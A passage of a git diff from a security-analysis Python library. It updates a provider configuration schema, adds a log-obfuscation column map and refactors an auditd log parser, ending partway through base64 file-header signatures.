+##           required (bool): if the setting is required
+##           default (str): The default value e.g. True, a_value, ["one"; "two"]
+##             In the case of bool/str/int/enum this is a simple string with no quotes
+##             For m_enum it is a list of items (optionally quoted) separated by semi-colons
+##           format: uuid
+##             only uuid is supported
+##           options (list):
+##              A list of options for the list box, separated by ";" e.g.
+##              options=[one; two; three]
+definitions:
+  # Azure Sentinel workspace definition
+  workspace_defn: &workspace
+    WorkspaceId: str(format=uuid)
+    TenantId: str(format=uuid)
+    SubscriptionId: str(required=False, format=uuid)
+    ResourceGroup: str(required=False)
+  # Providers args definition
+  env_var_defn: &env_var
+    EnvironmentVar: str()
+  kv_path_defn: &kv_path
+    KeyVault: str(required=False)
+  cred_key_opts:
+    one_of:
+      - str: str()
+      - <<: *env_var
+      - <<: *kv_path
+  macros:
+    - &cred_key cred_key(mp_defn_path="/definitions/cred_key_opts")
+    - &cred_key_opt cred_key(mp_defn_path="/definitions/cred_key_opts", required=False)
+AzureSentinel:
+  Workspaces:
+    # Workspace used if you don't explicitly name a workspace when creating WorkspaceConfig
+    # Specifying values here overrides config.json settings unless you explicitly load
+    # WorkspaceConfig with config_file parameter (WorkspaceConfig(config_file="../config.json")
+    Default:
+      <<: *workspace
+Azure:
+  cloud: enum(required=False, options=[global; cn; usgov; de], default=global)
+  auth_methods: m_enum(required=False, options=[env; msi; cli; interactive], default=["cli"; "msi", "interactive"])
+QueryDefinitions:
+  # Add paths to folders containing custom query definitions here
+  Custom: list(required=False)
+TIProviders:
+  # If a provider has Primary: True it will be run by default on IoC lookups
+  # Secondary providers can be run optionally
+  OTX:
+    Args:
+      AuthKey: *cred_key
+    Primary: bool(default=True)
+    Provider: "OTX"
+  VirusTotal:
+    Args:
+      AuthKey: *cred_key
+      UseVT3PrivateAPI: bool(required=False, default=False)
+    Primary: bool(default=True)
+    Provider: "VirusTotal"
+  XForce:
+    # You can store items in an environment variable using this syntax
+    Args:
+      ApiID: *cred_key
+      AuthKey: *cred_key
+    Primary: bool(default=False)
+    Provider: "XForce"
+  AzureSentinel:
+    # Note this can be a different workspace/tenant from your main workspace
+    # This only controls where the Azure Sentinel TI provider looks for the
+    # ThreatIndicator table.
+    Args:
+      WorkspaceID: str(format=uuid)
+      TenantID: str(format=uuid)
+    Primary: bool(default=False)
+    Provider: "AzSTI"
+  OpenPageRank:
+    Args:
+      AuthKey: *cred_key
+    Primary: bool(default=False)
+    Provider: "OPR"
+  TorExitNodes:
+    Primary: bool(default=False)
+    Provider: "Tor"
+  GreyNoise:
+    Args:
+      # Leave AuthKey empty to use the community API or populate if you want to use the Enterprise API features.
+      AuthKey: *cred_key
+    Primary: bool(default=True)
+    Provider: "GreyNoise"
+  RiskIQ:
+    Primary: bool(default=True)
+    Provider: "RiskIQ"
+    Args:
+      ApiID: str()
+      AuthKey: *cred_key
+  IntSights:
+    Primary: bool(default=True)
+    Provider: "IntSights"
+    Args:
+      ApiID: str()
+      AuthKey: *cred_key
+OtherProviders:
+  GeoIPLite:
+    Args:
+      AuthKey: *cred_key
+      DBFolder: str(default="~/.msticpy")
+    Provider: "GeoLiteLookup"
+  IPStack:
+    Args:
+      AuthKey: *cred_key
+    Provider: "IPStackLookup"
+DataProviders:
+  AzureCLI:
+    Args:
+      auth_methods: m_enum(required=False, options=[env; msi; cli; interactive], default=["env"; "interactive"])
+      clientId: str(required=False, format=uuid)
+      tenantId: str(required=False, format=uuid)
+      # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+      clientSecret: *cred_key
+  Splunk:
+    Args:
+      host: str()
+      username: str(required=False)
+      # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+      password: *cred_key
+      port: int(required=False)
+      http_scheme: str(default=https, required=False)
+      verify: bool(required=False)
+      owner: str(required=False)
+      app: str(required=False)
+      # Note option lists can be surrounded by quotes or []
+      # option items can be quoted or not - always treated as strings - ";" separated
+      sharing: enum(required=False, options=[global; system; app; user], default=global)
+      token: str(required=False)
+      cookie: str(required=False)
+      autologin: bool(required=False)
+  LocalData:
+    data_paths: list(required=False)
+  Mordor:
+    save_folder: str(required=False)
+    use_cached: bool(required=False, default=True)
+  Browshot:
+    Args:
+      AuthKey: *cred_key
+  MicrosoftDefender:
+    Args:
+      ClientId: str(format=uuid)
+      TenantId: str(format=uuid)
+      # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+      ClientSecret: *cred_key
+  MicrosoftGraph:
+    Args:
+      ClientId: str(format=uuid)
+      TenantId: str(format=uuid)
+      # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+      ClientSecret: *cred_key
+  Sumologic:
+    Args:
+      connection_str: str()
+      accessid: str()
+      # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+      accesskey: *cred_key
+AzureCLI:
+  # Deprecated section - use DataProviders.AzureCLI
+  Args:
+    auth_methods: m_enum(required=False, options=[env; msi; cli; interactive], default=["env"; "interactive"])
+    clientId: str(required=False, format=uuid)
+    tenantId: str(required=False, format=uuid)
+    # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+    clientSecret: *cred_key
+KeyVault:
+  # Key Vault connection specification for secrets
+  TenantId: str(format=uuid)
+  SubscriptionId: str(format=uuid, required=False)
+  ResourceGroup: str(required=False)
+  AzureRegion: str(required=False)
+  VaultName: str()
+  UseKeyring: bool(default=True, required=False)
+  Authority: enum(options="global; usgov; de; cn", default=global)
+UserDefaults:
+  # List of query providers to load
+  QueryProviders:
+    AzureSentinel:
+      workspace:
+        alias: str(required=False)
+        connect: bool(required=False, default=True)
+    provider:
+      alias: str(required=False)
+      connect: bool(required=False, default=True)
+
+  # List of other providers/components to load
+  LoadComponents:
+    TILookup:
+    GeoIpLookup:
+      provider: str(default=GeoLiteLookup)
+    Notebooklets:
+      query_provider:
+        AzureSentinel: txt_dict(default=workspace:Default)
+    Pivot:
+    AzureData:
+      auth_methods: m_enum(options=[env; msi; cli; interactive], default=[env; interactive])
+      connect: bool(default=True)
+    AzureSentinelAPI:
+      auth_methods: m_enum(options=[env; msi; cli; interactive], default=["env"; "interactive"])
+      res_id: str(default=None)
+      connect: bool(default=True)
diff --git a/msticpy/resources/obfuscation_cols.yaml b/msticpy/resources/obfuscation_cols.yaml
new file mode 100644
index 000000000..38b4a78a1
--- /dev/null
+++ b/msticpy/resources/obfuscation_cols.yaml
@@ -0,0 +1,77 @@
+Common:
+  AADTenantId: uuid
+  Account: acct
+  Computer: '@./:.'
+  DeviceDetail: dict
+  Host: '@./:.'
+  IpAddress: ip
+  Location: str
+  LocationDetails: dict
+  ResourceId: '@./:'
+  SourceComputerId: uuid
+  SubjectDomainName: .
+  SubjectUserName: acct
+  SubjectUserSid: sid
+  TargetDomainName: .
+  TargetUserName: acct
+  TargetUserSid: sid
+  TenantId: uuid
+  UserDisplayName: ' @.'
+  UserId: uuid
+  UserPrincipalName: acct
+  VMName: '@./:.'
+AAD:
+  AlternateSignInName: '@./:'
+  ConditionalAccessPolicies: list
+  IPAddress: ip
+  Id: uuid
+  Identity: str
+  ResourceDisplayName: str
+  ResourceGroup: str
+  ResourceIdentity: str
+O365:
+  AADGroupId: str
+  ClientIP: ip
+  ClientIP_: ip
+  ClientInfoString: str
+  ClientMachineName: '@./:.'
+  Client_IPAddress: ip
+  DestMailboxId: str
+  DestMailboxOwnerUPN: acct
+  DestinationFileName: '@./:.'
+  DestinationRelativeUrl: '@./:.'
+  Event_Data: str
+  Folder: str
+  LogonUserDisplayName: ' '
+  LogonUserSid: '-'
+  Logon_Type: ip
+  MachineDomainInfo: str
+  MachineId: str
+  MailboxGuid: uuid
+  MailboxOwnerMasterAccountSid: '-'
+  MailboxOwnerSid: '-'
+  MailboxOwnerUPN: acct
+  ModifiedObjectResolvedName: ip
+  OfficeObjectId: '/:. '
+  OfficeTenantId: uuid
+  OfficeTenantId_: uuid
+  OrganizationId: uuid
+  OrganizationId_: uuid
+  OrganizationName: str
+  OriginatingServer: .
+  Parameters: str
+  Site_: uuid
+  Site_Url: '@./:.'
+  Site_Url_: '@./:.'
+  SourceFileName: '@./:.'
+  SourceFileName_: '@./:.'
+  SourceRelativeUrl: '@./:.'
+  SourceRelativeUrl_: '@./:.'
+  UserDomain: '@./:.'
+  UserId_: acct
+  UserKey: '@./:.'
+  UserSharedWith: str
+  _ResourceId: '@./:.'
+WindowsSecurity:
+  WorkstationName: '@./:.'
+
diff --git a/msticpy/sectools/__init__.py b/msticpy/sectools/__init__.py
index aceee190c..4876be98a 100644
--- a/msticpy/sectools/__init__.py
+++ b/msticpy/sectools/__init__.py
@@ -6,7 +6,19 @@
 """MSTIC Security Tools."""
 
 # flake8: noqa: F403
-from . import base64unpack as b64
-from . iocextract import *
-from . vtlookup import *
-from . eventcluster import *
+# pylint: disable=W0401
+from .iocextract import IoCExtract
+from .geoip import GeoLiteLookup, IPStackLookup, geo_distance
+from .tilookup import TILookup
+from .vtlookup import VTLookup
+from . import base64unpack as base64
+from . import process_tree_utils as ptree
+from .._version import VERSION
+
+try:
+    from IPython import get_ipython
+    from . import sectools_magics
+except ImportError as err:
+    pass
+
+__version__ = VERSION
diff --git a/msticpy/sectools/auditdextract.py b/msticpy/sectools/auditdextract.py
index 9da2ad2e0..a931d3553 100644
--- a/msticpy/sectools/auditdextract.py
+++ b/msticpy/sectools/auditdextract.py
@@ -3,216 +3,359 @@
 # Licensed under the MIT License. See License.txt in the project root for
 # license information.
 # --------------------------------------------------------------------------
-"""Auditd extractor."""
+"""
+Auditd extractor.
+
+Module to load and decode Linux audit logs. It collapses messages
+sharing the same message ID into single events, decodes hex-encoded data
+fields and performs some event-specific formatting and normalization
+(e.g. for process start events it will re-assemble the process command
+line arguments into a single string). This is still a work-in-progress.
+
+"""
 import codecs
+import re
 from datetime import datetime
-
+from typing import Mapping, Any, Tuple, Dict, List, Optional, Set
 import pandas as pd
 
-from .. _version import VERSION
+from .proc_tree_builder import build_process_tree
 
-__version__ = VERSION
-__author__ = 'Ian Hellen'
+try:
+    # pylint: disable=unused-import
+    from ..analysis import cluster_auditd  # type: ignore
+except ImportError:
+
+    def cluster_auditd(*args, **kwargs):  # type: ignore
+        """Fake cluster_auditd function for partial install."""
+        raise NotImplementedError("Cannot import auditd cluster module.")
 
-_ENCODED_PARAMS = {'EXECVE': {'a0', 'a1', 'a2', 'a3', 'arch'},
-                   'PROCTITLE': {'proctitle'},
-                   'USER_CMD': {'cmd'}}
 
+from .._version import VERSION
 
-def unpack_auditd(audit_str: str) -> dict:
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+# Constants
+# Fields that we know are frequently encoded
+_ENCODED_PARAMS: Dict[str, Set[str]] = {
+    "EXECVE": {"a0", "a1", "a2", "a3", "arch"},
+    "PROCTITLE": {"proctitle"},
+    "USER_CMD": {"cmd"},
+}
+
+# USER_START message schema
+_USER_START: Dict[str, Optional[str]] = {
+    "pid": "int",
+    "uid": "int",
+    "auid": "int",
+    "ses": "int",
+    "msg": None,
+    "acct": None,
+    "exe": None,
+    "hostname": None,
+    "addr": None,
+    "terminal": None,
+    "res": None,
+}
+
+# Message types schema
+_FIELD_DEFS: Dict[str, Dict[str, Optional[str]]] = {
+    "SYSCALL": {
+        "success": None,
+        "ppid": "int",
+        "pid": "int",
+        "auid": "int",
+        "uid": "int",
+        "gid": "int",
+        "euid": "int",
+        "egid": "int",
+        "ses": "int",
+        "exe": None,
+        "com": None,
+    },
+    "CWD": {"cwd": None},
+    "PROCTITLE": {"proctitle": None},
+    "LOGIN": {
+        "pid": "int",
+        "uid": "int",
+        "tty": None,
+        "old-ses": "int",
+        "ses": "int",
+        "res": None,
+    },
+    "EXECVE": {"argc": "int", "a0": None, "a1": None, "a2": None},
+    "_USER_START": _USER_START,
+    "USER_END": _USER_START,
+    "CRED_DISP": _USER_START,
+    "USER_ACCT": _USER_START,
+    "CRED_ACQ": _USER_START,
+    "USER_CMD": {
+        "pid": "int",
+        "uid": "int",
+        "auid": "int",
+        "ses": "int",
+        "msg": None,
+        "cmd": None,
+        "terminal": None,
+        "res": None,
+    },
+}
+
+
+def unpack_auditd(audit_str: List[Dict[str, str]]) -> Mapping[str, Mapping[str, Any]]:
     """
-    Unpack an Auditd message and returns a dictionary of fields.
+    Unpack an Audit message and returns a dictionary of fields.
 
-    Arguments:
-        audit_str {str} -- The auditd raw record
+    Parameters
+    ----------
+    audit_str : str
+        The auditd raw record
 
-    Returns:
-        {dict} -- the extract message fields and values
+    Returns
+    -------
+    Mapping[str, Any]
+        The extracted message fields and values
 
     """
-    event_dict = {}
-    for record in audit_str:
+    event_dict: Dict[str, Dict[str, Any]] = {}
+    # The audit_str should be a list of dicts - '{EXECVE : {'p1': 'foo', p2: 'bar'...},
+    #                                      PATH: {'a1': 'xyz',....}}
 
+    for record in audit_str:
+        # process a single message type, splitting into type name
+        # and contents
         for rec_key, rec_val in record.items():
-            rec_dict = {}
+            rec_dict: Dict[str, Optional[str]] = {}
+            # Get our field mapping for encoded params for this
+            # mssg_type (rec_key)
             encoded_fields_map = _ENCODED_PARAMS.get(rec_key, None)
             for rec_item in rec_val:
-                rec_split = rec_item.split('=', maxsplit=1)
+                # for each mssg item, split into k/v pair
+                rec_split = rec_item.split("=", maxsplit=1)
                 if len(rec_split) == 1:
                     rec_dict[rec_split[0]] = None
                     continue
-                if (not encoded_fields_map or rec_split[1].startswith('"') or
-                        rec_split[0] not in encoded_fields_map):
-                    field_value = rec_split[1].strip('\"')
+                if (
+                    not encoded_fields_map
+                    or rec_split[1].startswith('"')
+                    or rec_split[0] not in encoded_fields_map
+                ):
+                    field_value = rec_split[1].strip('"')
                 else:
                     try:
-                        field_value = codecs.decode(
-                            rec_split[1], 'hex').decode('utf-8')
+                        # Try to decode this from hex-string to text
+                        # Mypy thinks codecs.decode returns a str so
+                        # incorrectly issues a type warning - in this case it
+                        # will return a bytes string.
+                        field_value = codecs.decode(  # type: ignore
+                            bytes(rec_split[1], "utf-8"), "hex"
+                        ).decode("utf-8")
                     except ValueError:
                         field_value = rec_split[1]
                         print(rec_val)
-                        print('ERR:', rec_key,
-                              rec_split[0], rec_split[1], type(rec_split[1]))
+                        print(
+                            "ERR:",
+                            rec_key,
+                            rec_split[0],
+                            rec_split[1],
+                            type(rec_split[1]),
+                        )
                 rec_dict[rec_split[0]] = field_value
             event_dict[rec_key] = rec_dict
 
     return event_dict
 
 
-_USER_START = {'pid': 'int', 'uid': 'int', 'auid': 'int',
-               'ses': 'int', 'msg': None, 'acct': None, 'exe': None,
-               'hostname': None, 'addr': None, 'terminal': None,
-               'res': None}
-_FIELD_DEFS = {'SYSCALL': {'success': None, 'ppid': 'int', 'pid': 'int',
-                           'auid': 'int', 'uid': 'int', 'gid': 'int',
-                           'euid': 'int', 'egid': 'int', 'ses': 'int',
-                           'exe': None, 'com': None},
-               'CWD': {'cwd': None},
-               'PROCTITLE': {'proctitle': None},
-               'LOGIN': {'pid': 'int', 'uid': 'int', 'tty': None, 'old-ses': 'int',
-                         'ses': 'int', 'res': None},
-               'EXECVE': {'argc': 'int', 'a0': None, 'a1': None, 'a2': None},
-               '_USER_START': _USER_START,
-               'USER_END': _USER_START,
-               'CRED_DISP': _USER_START,
-               'USER_ACCT': _USER_START,
-               'CRED_ACQ': _USER_START,
-               'USER_CMD': {'pid': 'int', 'uid': 'int', 'auid': 'int',
-                            'ses': 'int', 'msg': None, 'cmd': None,
-                            'terminal': None, 'res': None},
-               }
-
-
-def _extract_event(message_dict: dict) -> tuple(str, dict):
+def _extract_event(message_dict: Mapping[str, Any]) -> Tuple[str, Mapping[str, Any]]:
     """
     Assemble discrete messages sharing the same message Id into a single event.
 
-    Arguments:
-        message_dict {dict} -- the input dictionary
+    Parameters
+    ----------
+    message_dict : Mapping[str, Any]
+        the input dictionary
 
-    Returns:
-        {tuple({str}, {dict})} the assembled message type and contents
+    Returns
+    -------
+    Tuple[str, Mapping[str, Any]
+        the assembled message type and contents
 
     """
-    if 'SYSCALL' in message_dict:
-        proc_create_dict = {}
-        for mssg_type in ['SYSCALL', 'CWD', 'EXECVE', 'PROCTITLE']:
-            if (mssg_type not in message_dict or
-                    mssg_type not in _FIELD_DEFS):
+    # Handle process executions specially
+    if "SYSCALL" in message_dict and "EXECVE" in message_dict:
+        proc_create_dict: Dict[str, Any] = {}
+        for mssg_type in ["SYSCALL", "CWD", "EXECVE", "PROCTITLE"]:
+            if mssg_type not in message_dict or mssg_type not in _FIELD_DEFS:
                 continue
-            for fieldname, conv in _FIELD_DEFS[mssg_type].items():
-                value = message_dict[mssg_type].get(fieldname, None)
-                if not value:
-                    continue
-                if conv:
-                    if conv == 'int':
-                        value = int(value)
-                        if value == 4294967295:
-                            value = -1
-                proc_create_dict[fieldname] = value
-            if mssg_type == 'EXECVE':
-                args = int(proc_create_dict.get('argc', 1))
-                arg_strs = []
-                for arg_idx in range(0, args):
-                    arg_strs.append(proc_create_dict.get(f'a{arg_idx}', ''))
-
-                proc_create_dict['cmdline'] = ' '.join(arg_strs)
-        return 'SYSCALL', proc_create_dict
-    else:
-        event_dict = {}
-        for mssg_type, _ in message_dict.items():
-            if mssg_type in _FIELD_DEFS:
-                for fieldname, conv in _FIELD_DEFS[mssg_type].items():
-                    value = message_dict[mssg_type].get(fieldname, None)
-                    if conv:
-                        if conv == 'int':
-                            value = int(value)
-                            if value == 4294967295:
-                                value = -1
-                    event_dict[fieldname] = value
-            else:
-
-                event_dict.update(message_dict[mssg_type])
-        return list(message_dict.keys())[0], event_dict
+            _extract_mssg_value(mssg_type, message_dict, proc_create_dict)
+
+            if mssg_type == "EXECVE":
+                args = int(proc_create_dict.get("argc", 1))
+                arg_strs = [
+                    proc_create_dict.get(f"a{arg_idx}", "") for arg_idx in range(args)
+                ]
+                proc_create_dict["cmdline"] = " ".join(arg_strs)
+        return "SYSCALL_EXECVE", proc_create_dict
+
+    event_dict: Dict[str, Any] = {}
+    for mssg_type, _ in message_dict.items():
+        if mssg_type in _FIELD_DEFS:
+            _extract_mssg_value(mssg_type, message_dict, event_dict)
+        else:
+            # We don't check for duplicated keys here - if
+            # there are multiple messages with the same key, the
+            # last one will overwrite the previous value
+            event_dict.update(message_dict[mssg_type])
+    return list(message_dict.keys())[0], event_dict
+
+
+def _extract_mssg_value(
+    mssg_type: str,
+    message_dict: Mapping[str, Mapping[str, Any]],
+    event_dict: Dict[str, Any],
+):
+    """
+    Extract field/value from the message dictionary.
+
+    Parameters
+    ----------
+    mssg_type : str
+        The Audit message type
+    message_dict : Mapping[str, str]
+        The input dictionary
+    event_dict : Dict[str, Any]
+        The output dictionary
+
+    """
+    # if the field requires conversion conv will specify the
+    # target type - only int currently
+    for fieldname, conv in _FIELD_DEFS[mssg_type].items():
+        value = message_dict[mssg_type].get(fieldname, None)
+        if not value:
+            return
+        if conv and conv == "int":
+            value = int(value)
+            if value == 4294967295:
+                value = -1
+        if fieldname in event_dict:
+            event_dict[f"{fieldname}_{mssg_type}"] = value
+        else:
+            event_dict[fieldname] = value
 
 
 def _move_cols_to_front(data: pd.DataFrame, column_count: int = 1) -> pd.DataFrame:
     """
     Move N columns from end to front of DataFrame.
 
-    Arguments:
-        data {pd.DataFrame} -- The input DataFrame
-
-    Keyword Arguments:
-        column_count {int} -- The number of columns to move (default: {1})
+    Parameters
+    ----------
+    data : pd.DataFrame
+        The input DataFrame
+    column_count : int, optional
+        The number of columns to move (the default is 1)
 
-    Returns:
-        pd.DataFrame -- DataFrame with N columns shifted to front
+    Returns
+    -------
+    pd.DataFrame
+        DataFrame with `column_count` columns shifted to front
 
     """
     return data[list(data.columns[-column_count:]) + list(data.columns[:-column_count])]
 
 
-def extract_events_to_df(data: pd.DataFrame,
-                         input_column: str = 'AuditdMessage',
-                         event_type: str = None,
-                         verbose: bool = False) -> pd.DataFrame:
+def extract_events_to_df(
+    data: pd.DataFrame,
+    input_column: str = "AuditdMessage",
+    event_type: str = None,
+    verbose: bool = False,
+) -> pd.DataFrame:
     """
     Extract auditd raw messages into a dataframe.
 
-    Arguments:
-        data {pd.DataFrame} -- The input dataframe with raw auditd
-            data in a single string column
-
-    Keyword Arguments:
-        input_column {str} -- the input column name (default: {'AuditdMessage'})
-        event_type {str} -- the event type, if None, defaults to all
-            (default: {None})
-        verbose {bool} -- Give feedback on stages of processing (default: {False})
-
-    Returns:
-        pd.DataFrame -- The resultant DataFrame
+    Parameters
+    ----------
+    data : pd.DataFrame
+        The input dataframe with raw auditd data in
+        a single string column
+    input_column : str, optional
+        the input column name (the default is 'AuditdMessage')
+    event_type : str, optional
+        the event type, if None, defaults to all (the default is None)
+    verbose : bool, optional
+        Give feedback on stages of processing (the default is False)
+
+    Returns
+    -------
+    pd.DataFrame
+        The resultant DataFrame
 
     """
     if verbose:
         start_time = datetime.utcnow()
-        print(f'Unpacking auditd messages for {len(data)} events...')
-
-    tmp_df = (data.apply(lambda x: _extract_event(unpack_auditd(x[input_column])),
-                         axis=1, result_type='expand')
-              .rename(columns={0: 'EventType',
-                               1: 'EventData'})
-              )
+        print(f"Unpacking auditd messages for {len(data)} events...")
+
+    # If the provided table has auditd messages as a string format and
+    # extract key elements.
+    if isinstance(data[input_column].head(1)[0], str):
+        data["mssg_id"] = data.apply(
+            lambda x: _extract_timestamp(x[input_column]), axis=1
+        )
+        data[input_column] = data.apply(
+            lambda x: _parse_audit_message(x[input_column]), axis=1
+        )
+
+    # Our first pandas expression does most of the work - unpacking the
+    # column contents, then extracting these into a two columns
+    # EventType (the main auditd mssg type) and a dict of k/v values
+    # EventData
+    tmp_df = data.apply(
+        lambda x: _extract_event(unpack_auditd(x[input_column])),
+        axis=1,
+        result_type="expand",
+    ).rename(columns={0: "EventType", 1: "EventData"})
     # if only one type of event is requested
     if event_type:
-        tmp_df = tmp_df[tmp_df['EventType'] == event_type]
+        tmp_df = tmp_df.loc[tmp_df["EventType"] == event_type]
         if verbose:
-            print(f'Event subset = ', event_type, ' (events: {len(tmp_df)})')
+            print(f"Event subset = {event_type} (events: {len(tmp_df)})")
 
     if verbose:
-        print('Building output dataframe...')
-
-    tmp_df = (tmp_df.apply(lambda x: pd.Series(x.EventData), axis=1)
-              .merge(tmp_df[['EventType']], left_index=True, right_index=True)
-              .merge(data.drop([input_column], axis=1),
-                     how='inner', left_index=True, right_index=True)
-              .dropna(axis=1, how='all'))
+        print("Building output dataframe...")
+
+    # We convert the EventData dict into a series,
+    # then merge with:
+    # First - the intermediate input DF to add back the EventType column
+    # Second - the original input DF to add back metadata columns like Computer
+    # Finally get rid of any empty columns
+    tmp_df = (
+        tmp_df.apply(lambda x: pd.Series(x.EventData), axis=1)
+        .merge(tmp_df[["EventType"]], left_index=True, right_index=True)
+        .merge(
+            data.drop([input_column], axis=1),
+            how="inner",
+            left_index=True,
+            right_index=True,
+        )
+        .dropna(axis=1, how="all")
+    )
 
     if verbose:
-        print('Fixing timestamps...')
+        print("Fixing timestamps...")
 
     # extract real timestamp from mssg_id
-    tmp_df['TimeStamp'] = (tmp_df.apply(lambda x:
-                                        datetime.utcfromtimestamp(
-                                            float(x.mssg_id.split(':')[0])),
-                                        axis=1))
-    tmp_df = (tmp_df.drop(['TimeGenerated'], axis=1)
-              .rename(columns={'TimeStamp': 'TimeGenerated'})
-              .pipe(_move_cols_to_front, column_count=5))
+    tmp_df["TimeStamp"] = tmp_df.apply(
+        lambda x: datetime.utcfromtimestamp(float(x["mssg_id"].split(":")[0])), axis=1
+    )
+    if "TimeGenerated" in tmp_df:
+        tmp_df = tmp_df.drop(["TimeGenerated"], axis=1)
+    tmp_df = tmp_df.rename(columns={"TimeStamp": "TimeGenerated"}).pipe(
+        _move_cols_to_front, column_count=5
+    )
     if verbose:
-        print(f'Complete. {len(tmp_df)} output rows', end=' ')
+        print(f"Complete. {len(tmp_df)} output rows", end=" ")
         delta = datetime.utcnow() - start_time
-        print(f'time: {delta.seconds + delta.microseconds/1_000_000} sec')
+        print(f"time: {delta.seconds + delta.microseconds/1_000_000} sec")
 
     return tmp_df
 
@@ -221,15 +364,161 @@ def get_event_subset(data: pd.DataFrame, event_type: str) -> pd.DataFrame:
     """
     Return a subset of the events matching type event_type.
 
-    Arguments:
-        data {pd.DataFrame} -- The input data
-        event_type {str} -- The event type to select
+    Parameters
+    ----------
+    data : pd.DataFrame
+        The input data
+    event_type : str
+        The event type to select
 
-    Returns:
-        pd.DataFrame -- The subset of the data where
-            data['EventType'] == event_type
+    Returns
+    -------
+    pd.DataFrame
+        The subset of the data where
+        data['EventType'] == event_type
+
+    """
+    return (
+        data[data["EventType"] == event_type].dropna(axis=1, how="all").infer_objects()
+    )
+
+
+def read_from_file(
+    filepath: str, event_type: str = None, verbose: bool = False, dummy_sep: str = "\t"
+) -> pd.DataFrame:
+    r"""
+    Extract Audit events from a log file.
+
+    Parameters
+    ----------
+    filepath : str
+        path to the input file
+    event_type : str, optional
+        The type of event to extract if only a subset required.
+        (the default is None, which processes all types)
+    verbose : bool, optional
+        If true more progress messages are output
+        (the default is False)
+    dummy_sep : str, optional
+        Separator to use for reading the 'csv' file
+        (default is tab - '\t')
+
+    Returns
+    -------
+    pd.DataFrame
+        The output DataFrame
+
+    Notes
+    -----
+    The dummy_sep parameter should be a character that does not
+    occur in an input line. This function uses pandas read_csv
+    to read the audit lines into a single column. Using a separator
+    that does appear in the input (e.g. space or comma) will cause
+    data to be parsed into multiple columns and anything after the
+    first separator in a line will be lost.
+
+    """
+    # read in the file using pd.read_csv()
+    df_raw: pd.DataFrame = pd.read_csv(
+        filepath, sep=dummy_sep, names=["raw_data"], skip_blank_lines=True
+    )
+
+    # extract message ID into separate column
+    df_raw["mssg_id"] = df_raw.apply(
+        lambda x: _extract_timestamp(x["raw_data"]), axis=1
+    )
+    # pylint: disable=unsupported-assignment-operation, no-member
+    # Pack message type and content into a dictionary:
+    # {'mssg_type: ['item1=x, item2=y....]}
+    df_raw["AuditdMessage"] = df_raw.apply(
+        lambda x: _parse_audit_message(x["raw_data"]), axis=1
+    )
+
+    # Group the data by message id string and concatenate the message content
+    # dictionaries in a list.
+    df_grouped_cols = (
+        df_raw.groupby(["mssg_id"]).agg({"AuditdMessage": list}).reset_index()
+    )
+    # pylint: enable=unsupported-assignment-operation, no-member
+
+    # pass this DataFrame to the event extractor.
+    return extract_events_to_df(
+        data=df_grouped_cols,
+        input_column="AuditdMessage",
+        event_type=event_type,
+        verbose=verbose,
+    )
+
+
+def _parse_audit_message(audit_str: str) -> Dict[str, List[str]]:
+    """
+    Parse an auditd message string into Dict format required by unpack_auditd.
+
+    Parameters
+    ----------
+    audit_str : str
+        The Audit message
+
+    Returns
+    -------
+    Dict[str, str]
+        The extracted message values
+
+    """
+    audit_message = audit_str.rstrip().split(": ")
+    audit_headers = audit_message[0]
+    audit_hdr_match = re.match(r"type=([^\s]+)", audit_headers)
+    if audit_hdr_match:
+        return {audit_hdr_match.group(1): audit_message[1].split(" ")}
+    return {}  # type ignore
+
+
+def _extract_timestamp(audit_str: str) -> str:
+    """
+    Parse an auditd message string and extract the message time.
+
+    Parameters
+    ----------
+    audit_str : str
+        The Audit message
+
+    Returns
+    -------
+    str
+        The extracted message time string
+
+    """
+    audit_message = audit_str.rstrip().split(": ")
+    audit_headers = audit_message[0]
+    audit_hdr_match = re.match(r".*msg=audit\(([^\)]+)\)", audit_headers)
+    if audit_hdr_match:
+        return audit_hdr_match.group(1).split(":")[0]
+    return ""
+
+
+# pylint: disable=too-many-branches
+def generate_process_tree(  # noqa: MC0001
+    audit_data: pd.DataFrame, branch_depth: int = 4, processes: pd.DataFrame = None
+) -> pd.DataFrame:
+    """
+    Generate process tree data from auditd logs.
+
+    Parameters
+    ----------
+    audit_data : pd.DataFrame
+        The Audit data containing process creation events
+    branch_depth: int, optional
+        The maximum depth of parent or child processes to extract from the data
+        (The default is 4)
+    processes: pd.DataFrame, optional
+        Dataframe of processes to generate tree for
+
+    Returns
+    -------
+    pd.DataFrame
+        The formatted process tree data
 
     """
-    return (data[data['EventType'] == event_type]
-            .dropna(axis=1, how='all')
-            .infer_objects())
+    # Superceded by process_tree_utils module
+    del branch_depth, processes
+    return build_process_tree(audit_data)
diff --git a/msticpy/sectools/base64unpack.py b/msticpy/sectools/base64unpack.py
index 43aa0de66..244a8d372 100644
--- a/msticpy/sectools/base64unpack.py
+++ b/msticpy/sectools/base64unpack.py
@@ -31,74 +31,144 @@
 import io
 import re
 import tarfile
+
+# pylint: disable=unused-import
+from typing import Tuple, Any, Set, Optional, List, Iterable, Dict, Callable, Union
 import zipfile
 from collections import namedtuple
 
 import pandas as pd
 
-from .. nbtools.utility import pd_version_23, export
-from .. _version import VERSION
+from ..common.utility import export
+from .._version import VERSION
 
 __version__ = VERSION
-__author__ = 'Ian Hellen'
-
-_RESULT_FIELDS = ['reference', 'original_string', 'file_name', 'file_type',
-                  'input_bytes', 'decoded_string', 'encoding_type',
-                  'file_hashes', 'md5', 'sha1', 'sha256', 'printable_bytes']
-
-BinaryRecord = namedtuple('BinaryRecord', _RESULT_FIELDS)
+__author__ = "Ian Hellen"
+
+
+BinaryRecord = namedtuple(
+    "BinaryRecord",
+    [
+        "reference",
+        "original_string",
+        "file_name",
+        "file_type",
+        "input_bytes",
+        "decoded_string",
+        "encoding_type",
+        "file_hashes",
+        "md5",
+        "sha1",
+        "sha256",
+        "printable_bytes",
+    ],
+)
 
 # pylint: disable=locally-disabled, line-too-long
 _BASE64_HEADER_TYPES = {
-    'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug': 'exe',
